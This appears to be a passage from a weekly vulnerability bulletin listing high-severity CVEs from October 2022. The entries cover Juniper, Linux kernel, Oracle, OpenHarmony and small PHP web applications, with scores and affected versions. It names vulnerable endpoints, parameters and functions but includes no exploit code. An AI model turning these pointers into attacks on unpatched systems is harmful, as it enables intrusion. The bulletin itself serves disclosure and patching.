juniper — junos	An Access of Uninitialized Pointer vulnerability in SIP Application Layer Gateway (ALG) of Juniper Networks Junos OS on SRX Series and MX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). When specific valid SIP packets are received the PFE will crash and restart. This issue affects Juniper Networks Junos OS on SRX Series and MX Series: 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S2; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2; 22.1 versions prior to 22.1R1-S1, 22.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 20.4R1.	2022-10-18	7.5	CVE-2022-22236 CONFIRM
juniper — junos_os_evolved	An Execution with Unnecessary Privileges vulnerability in Management Daemon (mgd) of Juniper Networks Junos OS Evolved allows a locally authenticated attacker with low privileges to escalate their privileges on the device and potentially remote systems. This vulnerability allows a locally authenticated attacker with access to the ssh operational command to escalate their privileges on the system to root, or if there is user interaction on the local device to potentially escalate privileges on a remote system to root. This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R3-S5-EVO; 21.1-EVO versions prior to 21.1R3-EVO; 21.2-EVO versions prior to 21.2R2-S1-EVO, 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO. This issue does not affect Juniper Networks Junos OS.	2022-10-18	8.8	CVE-2022-22239 CONFIRM
juniper — junos_os_evolved	An Improper Validation of Syntactic Correctness of Input vulnerability in the kernel of Juniper Networks Junos OS Evolved on PTX series allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). When an incoming TCP packet destined to the device is malformed there is a possibility of a kernel panic. Only TCP packets destined to the ports for BGP, LDP and MSDP can trigger this. This issue only affects PTX10004, PTX10008, PTX10016. No other PTX Series devices or other platforms are affected. This issue affects Juniper Networks Junos OS Evolved: 20.4-EVO versions prior to 20.4R3-S4-EVO; 21.3-EVO versions prior to 21.3R3-EVO; 21.4-EVO versions prior to 21.4R3-EVO; 22.1-EVO versions prior to 22.1R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 20.4R1-EVO.	2022-10-18	7.5	CVE-2022-22192 CONFIRM
juniper — junos_os_evolved	A limitless resource allocation vulnerability in FPC resources of Juniper Networks Junos OS Evolved on PTX Series allows an unprivileged attacker to cause Denial of Service (DoS). Continuously polling the SNMP jnxCosQstatTable causes the FPC to run out of GUID space, causing a Denial of Service to the FPC resources. When the FPC runs out of the GUID space, you will see the following syslog messages. The evo-aftmand-bt process is asserting. fpc1 evo-aftmand-bt[17556]: %USER-3: get_next_guid: Ran out of Guid Space start 1748051689472 end 1752346656767 fpc1 audit[17556]: %AUTH-5: ANOM_ABEND auid=4294967295 uid=0 gid=0 ses=4294967295 pid=17556 comm=”EvoAftManBt-mai” exe=”/usr/sbin/evo-aftmand-bt” sig=6 fpc1 kernel: %KERN-5: audit: type=1701 audit(1648567505.119:57): auid=4294967295 uid=0 gid=0 ses=4294967295 pid=17556 comm=”EvoAftManBt-mai” exe=”/usr/sbin/evo-aftmand-bt” sig=6 fpc1 emfd-fpa[14438]: %USER-5: Alarm set: APP color=red, class=CHASSIS, reason=Application evo-aftmand-bt fail on node Fpc1 fpc1 emfd-fpa[14438]: %USER-3-EMF_FPA_ALARM_REP: RaiseAlarm: Alarm(Location: /Chassis[0]/Fpc[1] Module: sysman Object: evo-aftmand-bt:0 Error: 2) reported fpc1 sysepochman[12738]: %USER-5-SYSTEM_REBOOT_EVENT: Reboot [node] [ungraceful reboot] [evo-aftmand-bt exited] The FPC resources can be monitored using the following commands: user@router> start shell [vrf:none] user@router-re0:~$ cli -c “show platform application-info allocations app evo-aftmand-bt” \| grep ^fpc \| grep -v Route \| grep -i -v Nexthop \| awk ‘{total[$1] += $5} END { for (key in total) { print key ” ” total[key]/4294967296 }}’ Once the FPCs become unreachable they must be manually restarted as they do not self-recover. This issue affects Juniper Networks Junos OS Evolved on PTX Series: All versions prior to 20.4R3-S4-EVO; 21.1-EVO version 21.1R1-EVO and later versions; 21.2-EVO version 21.2R1-EVO and later versions; 21.3-EVO versions prior to 21.3R3-EVO; 21.4-EVO versions prior to 21.4R2-EVO; 22.1-EVO versions prior to 22.1R2-EVO.	2022-10-18	7.5	CVE-2022-22211 CONFIRM
juniper — junos_os_evolved	An Improper Input Validation vulnerability in ingress TCP segment processing of Juniper Networks Junos OS Evolved allows a network-based unauthenticated attacker to send a crafted TCP segment to the device, triggering a kernel panic, leading to a Denial of Service (DoS) condition. Continued receipt and processing of this TCP segment could create a sustained Denial of Service (DoS) condition. This issue affects Juniper Networks Junos OS Evolved: 21.3 versions prior to 21.3R3-EVO; 21.4 versions prior to 21.4R2-EVO; 22.1 versions prior to 22.1R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 21.3R1-EVO.	2022-10-18	7.5	CVE-2022-22247 CONFIRM
juniper — junos_os_evolved	An Incorrect Permission Assignment vulnerability in shell processing of Juniper Networks Junos OS Evolved allows a low-privileged local user to modify the contents of a configuration file which could cause another user to execute arbitrary commands within the context of the follow-on user’s session. If the follow-on user is a high-privileged administrator, the attacker could leverage this vulnerability to take complete control of the target system. While this issue is triggered by a user, other than the attacker, accessing the Junos shell, an attacker simply requires Junos CLI access to exploit this vulnerability. This issue affects Juniper Networks Junos OS Evolved: 20.4-EVO versions prior to 20.4R3-S1-EVO; All versions of 21.1-EVO; 21.2-EVO versions prior to 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 19.2R1-EVO.	2022-10-18	7.3	CVE-2022-22248 CONFIRM
juniper — paragon_active_assurance_control_center	An Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability, a stored XSS (or persistent), in the Control Center Controller web pages of Juniper Networks Paragon Active Assurance (Formerly Netrounds) allows a high-privilege attacker with ‘WRITE’ permissions to store one or more malicious scripts that will infect any other authorized user’s account when they accidentally trigger the malicious script(s) while managing the device. Triggering these attacks enables the attacker to execute commands with the permissions up to that of the superuser account. This issue affects: Juniper Networks Paragon Active Assurance (Formerly Netrounds) All versions prior to 3.1.1; 3.2 versions prior to 3.2.1.	2022-10-18	8.4	CVE-2022-22229 CONFIRM
keking — kkfileview	kkFileView 4.0 is vulnerable to Server-side request forgery (SSRF) via controllerOnlinePreviewController.java.	2022-10-17	9.8	CVE-2022-42149 MISC
lavalite — lavalite	In Lavalite 9.0.0, the XSRF-TOKEN cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.	2022-10-18	7.5	CVE-2022-42188 MISC
libtiff — libtiff	Multiple heap buffer overflows in tiffcrop.c utility in libtiff library Version 4.4.0 allows attacker to trigger unsafe or out of bounds memory access via crafted TIFF image file which could result into application crash, potential information disclosure or any other context-dependent impact	2022-10-21	9.8	CVE-2022-3570 MISC MISC MISC CONFIRM
linux — linux_kernel	An issue was discovered in the Linux kernel before 5.19.16. Attackers able to inject WLAN frames could cause a buffer overflow in the ieee80211_bss_info_update function in net/mac80211/scan.c.	2022-10-14	8.1	CVE-2022-41674 MISC MISC MISC MISC MISC FEDORA FEDORA FEDORA DEBIAN
linux — linux_kernel	A vulnerability classified as critical has been found in Linux Kernel. Affected is the function btf_dump_name_dups of the file tools/lib/bpf/btf_dump.c of the component libbpf. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211032.	2022-10-17	8	CVE-2022-3534 N/A N/A
linux — linux_kernel	A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087.	2022-10-17	8	CVE-2022-3564 MISC MISC
linux — linux_kernel	A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function del_timer of the file drivers/isdn/mISDN/l1oip_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211088.	2022-10-17	8	CVE-2022-3565 MISC MISC
linux — linux_kernel	A vulnerability classified as critical has been found in Linux Kernel. This affects the function spl2sw_nvmem_get_mac_address of the file drivers/net/ethernet/sunplus/spl2sw_driver.c of the component BPF. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211041 was assigned to this vulnerability.	2022-10-17	7.8	CVE-2022-3541 N/A N/A
linux — linux_kernel	A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability.	2022-10-17	7.8	CVE-2022-3545 N/A N/A
linux — linux_kernel	An out-of-bounds memory write flaw was found in the Linux kernel’s Kid-friendly Wired Controller driver. This flaw allows a local user to crash or potentially escalate their privileges on the system. It is in bigben_probe of drivers/hid/hid-bigbenff.c. The reason is incorrect assumption – bigben devices all have inputs. However, malicious devices can break this assumption, leaking to out-of-bound write.	2022-10-20	7.8	CVE-2022-3577 MISC MISC MISC
linux — linux_kernel	Various refcounting bugs in the multi-BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to trigger use-after-free conditions to potentially execute code.	2022-10-14	7.8	CVE-2022-42720 MISC MISC MISC FEDORA FEDORA FEDORA DEBIAN
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function ipv6_renew_options of the component IPv6 Handler. The manipulation leads to memory leak. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211021 was assigned to this vulnerability.	2022-10-16	7.5	CVE-2022-3524 MISC MISC
linux — linux_kernel	A vulnerability classified as problematic was found in Linux Kernel. This vulnerability affects the function macvlan_handle_frame of the file drivers/net/macvlan.c of the component skb. The manipulation leads to memory leak. The attack can be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211024.	2022-10-16	7.5	CVE-2022-3526 MISC MISC
linux — linux_kernel	A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function ipneigh_get of the file ip/ipneigh.c of the component iproute2. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211025 was assigned to this vulnerability.	2022-10-16	7.5	CVE-2022-3527 MISC MISC
linux — linux_kernel	A vulnerability, which was classified as problematic, was found in Linux Kernel. Affected is the function mptcp_addr_show of the file ip/ipmptcp.c of the component iproute2. The manipulation leads to memory leak. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. VDB-211026 is the identifier assigned to this vulnerability.	2022-10-16	7.5	CVE-2022-3528 MISC MISC
linux — linux_kernel	A vulnerability has been found in Linux Kernel and classified as problematic. Affected by this vulnerability is the function fdb_get of the file bridge/fdb.c of the component iproute2. The manipulation leads to memory leak. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211027.	2022-10-16	7.5	CVE-2022-3529 MISC MISC
linux — linux_kernel	A vulnerability was found in Linux Kernel and classified as problematic. Affected by this issue is the function ipaddr_link_get of the file ip/ipaddress.c of the component iproute2. The manipulation leads to memory leak. The attack may be launched remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211028.	2022-10-16	7.5	CVE-2022-3530 MISC MISC
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component BPF. The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363.	2022-10-18	7.5	CVE-2022-3594 N/A N/A
linux — linux_kernel	A vulnerability, which was classified as problematic, was found in Linux Kernel. This affects the function tcp_getsockopt/tcp_setsockopt of the component TCP Handler. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. The identifier VDB-211089 was assigned to this vulnerability.	2022-10-17	7.1	CVE-2022-3566 MISC MISC
linux — linux_kernel	A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function inet6_stream_ops/inet6_dgram_ops of the component IPv6 Handler. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. VDB-211090 is the identifier assigned to this vulnerability.	2022-10-17	7.1	CVE-2022-3567 MISC MISC
linux — linux_kernel	A vulnerability was found in Linux Kernel and classified as problematic. This issue affects the function hugetlb_no_page of the file mm/hugetlb.c. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211019.	2022-10-16	7	CVE-2022-3522 MISC MISC
magento — magento	Adobe Commerce versions 2.4.3-p2 (and earlier), 2.3.7-p3 (and earlier) and 2.4.4 (and earlier) are affected by an improper input validation vulnerability. An authenticated attacker can trigger an insecure direct object reference in the `V1/customers/me` endpoint to achieve information exposure and privilege escalation.	2022-10-20	8.8	CVE-2022-42344 MISC
markdownify_project — markdownify	Markdownify version 1.4.1 allows an external attacker to execute arbitrary code remotely on any client attempting to view a malicious markdown file through Markdownify. This is possible because the application has the “nodeIntegration” option enabled.	2022-10-19	7.8	CVE-2022-41709 MISC MISC
megazone — reversewall-mds	Remote code execution vulnerability due to insufficient user privilege verification in reverseWall-MDS. Remote attackers can exploit the vulnerability such as stealing account, through remote code execution.	2022-10-17	9.8	CVE-2022-23769 MISC
merchandise_online_store_project — merchandise_online_store	A SQL Injection issue in Merchandise Online Store v.1.0 allows an attacker to log in to the admin account.	2022-10-17	9.8	CVE-2022-42237 MISC
mikrotik — routeros	The Mikrotik RouterOS web server allows memory corruption in releases before Stable 6.38.5 and Long-term 6.37.5, aka Chimay-Red. A remote and unauthenticated user can trigger the vulnerability by sending a crafted HTTP request. An attacker can use this vulnerability to execute arbitrary code on the affected system, as exploited in the wild in mid-2017 and later.	2022-10-15	9.8	CVE-2017-20149 MISC MISC
minimatch_project — minimatch	A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.	2022-10-17	7.5	CVE-2022-3517 MISC MISC
mozilla — network_security_services	A vulnerability found in nss. By this security vulnerability, nss client auth crash without a user certificate in the database and this can lead us to a segmentation fault or crash.	2022-10-14	7.5	CVE-2022-3479 MISC MISC
mvpower — tv-7104he_firmware	MVPower CCTV DVR models, including TV-7104HE 1.8.4 115215B9 and TV7108HE, contain a web shell that is accessible via a /shell URI. A remote unauthenticated attacker can execute arbitrary operating system commands as root. This vulnerability has also been referred to as the “JAWS webserver RCE” because of the easily identifying HTTP response server field. Other firmware versions, at least from 2014 through 2019, can be affected. This was exploited in the wild in 2017 through 2022.	2022-10-19	9.8	CVE-2016-20016 MISC MISC MISC
netapp — clustered_data_ontap	Clustered Data ONTAP versions 9.11.1 through 9.11.1P2 with SnapLock configured FlexGroups are susceptible to a vulnerability which could allow an authenticated remote attacker to arbitrarily modify or delete WORM data prior to the end of the retention period.	2022-10-19	8.1	CVE-2022-23241 MISC
netgear — r6220_firmware	Netgear R6220 v1.1.0.114_1.0.1 suffers from Incorrect Access Control, resulting in a command injection vulnerability.	2022-10-17	8.8	CVE-2022-42221 MISC MISC
nopcommerce — nopcommerce	An access control issue in nopcommerce v4.50.2 allows attackers to arbitrarily modify any customer’s address via the addressedit endpoint.	2022-10-19	7.5	CVE-2022-33077 MISC MISC
ocomon_project — ocomon	OcoMon 4.0RC1 is vulnerable to Incorrect Access Control. Through a request the user can obtain the real email, sending the same request with correct email its possible to account takeover.	2022-10-19	7.5	CVE-2022-40798 MISC MISC
octopus — octopus_server	In affected versions of Octopus Server it is possible to use the Git Connectivity test function on the VCS project to initiate an SMB request resulting in the potential for an NTLM relay attack.	2022-10-14	8.1	CVE-2022-2780 MISC
online_birth_certificate_management_system_project — online_birth_certificate_management_system	Online Birth Certificate Management System version 1.0 is vulnerable to Cross Site Request Forgery (CSRF).	2022-10-14	8.8	CVE-2022-42070 MISC MISC
online_tours_&_travels_management_system_project — online_tours_&_travels_management_system	Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /user/update_booking.php.	2022-10-14	7.2	CVE-2022-41416 MISC
online_tours_&_travels_management_system_project — online_tours_&_travels_management_system	Online Tours & Travels Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /user_operations/profile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-18	7.2	CVE-2022-41537 MISC
online_tours_and_travels_management_system_project — online_tours_and_travels_management_system	Online Tours & Travels Management System v1.0 is vulnerable to Arbitrary code execution via ip/tour/admin/operations/update_settings.php.	2022-10-17	7.2	CVE-2022-42142 MISC
open_source_sacco_management_system_project — open_source_sacco_management_system	Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/manage_borrower.php.	2022-10-14	7.2	CVE-2022-41535 MISC
open_source_sacco_management_system_project — open_source_sacco_management_system	Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/manage_user.php.	2022-10-14	7.2	CVE-2022-41536 MISC
open_source_sacco_management_system_project — open_source_sacco_management_system	Open Source SACCO Management System v1.0 is vulnerable to SQL Injection via /sacco_shield/manage_payment.php.	2022-10-17	7.2	CVE-2022-42143 MISC
open_source_sacco_management_system_project — open_source_sacco_management_system	Open Source SACCO Management System v1.0 vulnerable to SQL Injection via /sacco_shield/manage_loan.php.	2022-10-18	7.2	CVE-2022-42218 MISC
opencats — opencats	OpenCATS v0.9.6 was discovered to contain a remote code execution (RCE) vulnerability via the getDataGridPager’s ajax functionality.	2022-10-19	9.8	CVE-2022-43019 MISC
openharmony — openharmony	OpenHarmony-v3.1.2 and prior versions have an authenication bypass vulnerability in a callback handler function of Softbus_server in communication subsystem. Attackers can launch attacks on distributed networks by sending Bluetooth rfcomm packets to any remote device and executing arbitrary commands.	2022-10-14	8.8	CVE-2022-42463 MISC
openharmony — openharmony	OpenHarmony-v3.1.2 and prior versions, 3.0.6 and prior versions have a Kernel memory pool override vulnerability in /dev/mmz_userdev device driver. The impact depends on the privileges of the attacker. The unprivileged process run on the device could disclose sensitive information including kernel pointer, which could be used in further attacks. The processes with system user UID run on the device would be able to mmap memory pools used by kernel and override them which could be used to gain kernel code execution on the device, gain root privileges, or cause device reboot.	2022-10-14	7.8	CVE-2022-42464 MISC
openharmony — openharmony	OpenHarmony-v3.1.2 and prior versions have a Missing permission validation vulnerability in param service of startup subsystem. An malicious application installed on the device could elevate its privileges to the root user, disable security features, or cause DoS by disabling particular services.	2022-10-14	7.8	CVE-2022-42488 MISC
opensecurity — mobile_security_framework	Mobile Security Framework (MobSF) v0.9.2 and below was discovered to contain a local file inclusion (LFI) vulnerability in the StaticAnalyzer/views.py script. This vulnerability allows attackers to read arbitrary files via a crafted HTTP request.	2022-10-18	7.5	CVE-2022-41547 MISC MISC
oracle — access_manager	Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: Admin Console). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Access Manager accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).	2022-10-18	7.5	CVE-2022-39412 MISC
oracle — bi_publisher	Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Core Formatting API). Supported versions that are affected are 5.9.0.0, 6.4.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data as well as unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle BI Publisher. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L).	2022-10-18	7.6	CVE-2022-21590 MISC
oracle — database	Vulnerability in the Oracle Database – Advanced Queuing component of Oracle Database Server. The supported version that is affected is 19c. Easily exploitable vulnerability allows high privileged attacker having DBA user privilege with network access via Oracle Net to compromise Oracle Database – Advanced Queuing. Successful attacks of this vulnerability can result in takeover of Oracle Database – Advanced Queuing. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).	2022-10-18	7.2	CVE-2022-21596 MISC
oracle — database_-_sharding	Vulnerability in the Oracle Database – Sharding component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Local Logon to compromise Oracle Database – Sharding. Successful attacks of this vulnerability can result in takeover of Oracle Database – Sharding. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).	2022-10-18	7.2	CVE-2022-21603 MISC
oracle — e-business_suite	Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).	2022-10-18	9.8	CVE-2022-21587 MISC
oracle — enterprise_data_quality	Vulnerability in the Oracle Enterprise Data Quality product of Oracle Fusion Middleware (component: Dashboard). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Data Quality. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Enterprise Data Quality, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Enterprise Data Quality accessible data as well as unauthorized update, insert or delete access to some of Oracle Enterprise Data Quality accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Data Quality. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L).	2022-10-18	8.8	CVE-2022-21613 MISC
oracle — enterprise_data_quality	Vulnerability in the Oracle Enterprise Data Quality product of Oracle Fusion Middleware (component: Dashboard). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Enterprise Data Quality. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Enterprise Data Quality accessible data as well as unauthorized access to critical data or complete access to all Oracle Enterprise Data Quality accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).	2022-10-18	8.1	CVE-2022-21612 MISC
oracle — enterprise_data_quality	Vulnerability in the Oracle Enterprise Data Quality product of Oracle Fusion Middleware (component: Dashboard). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Data Quality. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Enterprise Data Quality accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).	2022-10-18	7.5	CVE-2022-21614 MISC
oracle — enterprise_data_quality	Vulnerability in the Oracle Enterprise Data Quality product of Oracle Fusion Middleware (component: Dashboard). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Data Quality. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Enterprise Data Quality, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Enterprise Data Quality accessible data. CVSS 3.1 Base Score 7.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N).	2022-10-18	7.4	CVE-2022-21615 MISC
oracle — enterprise_manager_base_platform	Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Application Config Console). Supported versions that are affected are 13.4.0.0 and 13.5.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Enterprise Manager Base Platform accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).	2022-10-18	7.5	CVE-2022-21623 MISC
oracle — graalvm	Vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: LLVM Interpreter). Supported versions that are affected are Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle GraalVM Enterprise Edition. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	7.5	CVE-2022-21634 MISC
oracle — http_server	Vulnerability in the Oracle HTTP Server product of Oracle Fusion Middleware (component: OHS Config MBeans). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle HTTP Server accessible data as well as unauthorized update, insert or delete access to some of Oracle HTTP Server accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N).	2022-10-18	7.1	CVE-2022-21593 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.27 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).	2022-10-18	7.2	CVE-2022-21600 MISC
oracle — peoplesoft_enterprise_common_components	Vulnerability in the PeopleSoft Enterprise Common Components product of Oracle PeopleSoft (component: Approval Framework). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise Common Components. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all PeopleSoft Enterprise Common Components accessible data as well as unauthorized access to critical data or complete access to all PeopleSoft Enterprise Common Components accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).	2022-10-18	8.1	CVE-2022-39406 MISC
oracle — siebel_core_-_db_deployment_and_configuration_accessible_data	Vulnerability in the Siebel Core – DB Deployment and Configuration product of Oracle Siebel CRM (component: Repository Utilities). Supported versions that are affected are 22.8 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Siebel Core – DB Deployment and Configuration. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Siebel Core – DB Deployment and Configuration accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).	2022-10-18	7.5	CVE-2022-21598 MISC
oracle — soa_suite	Vulnerability in the Oracle SOA Suite product of Oracle Fusion Middleware (component: Adapters). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle SOA Suite. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle SOA Suite accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).	2022-10-18	7.5	CVE-2022-21622 MISC
